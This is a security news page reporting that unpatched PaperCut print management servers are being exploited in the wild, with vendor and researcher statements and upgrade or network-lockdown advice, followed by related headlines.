Security News > 2023 > April > Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers
Print management software provider PaperCut said that it has "Evidence to suggest that unpatched servers are being exploited in the wild," citing two vulnerability reports from cybersecurity company Trend Micro.
"PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC," it further added.
Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from PaperCut software to install remote management and maintenance software like Atera and Syncro for persistent access and code execution on the infected hosts.
"Potentially, the access gained through PaperCut exploitation could be used as a foothold leading to follow-on movement within the victim network, and ultimately ransomware deployment."
Users are recommended to upgrade to the fixed versions of PaperCut MF and NG as soon as possible, regardless of whether the server is "Available to external or internal connections," to mitigate potential risks.
Customers who are unable to upgrade to a security patch are advised to lock down network access to the servers by blocking all inbound traffic from external IPs and limiting IP addresses to only those belonging to verified site servers.
News URL
https://thehackernews.com/2023/04/russian-hackers-suspected-in-ongoing.html
Related news
- US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers (source)
- Russian security firm Dr.Web disconnects all servers after breach (source)
- Microsoft and DOJ disrupt Russian FSB hackers' attack infrastructure (source)
- 100+ domains seized to stymie Russian Star Blizzard hackers (source)
- Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday (source)
- CISA: Hackers abuse F5 BIG-IP cookies to map internal servers (source)
- Russian hackers deliver malicious RDP configuration files to thousands (source)
- Hackers increasingly use Winos4.0 post-exploitation kit in attacks (source)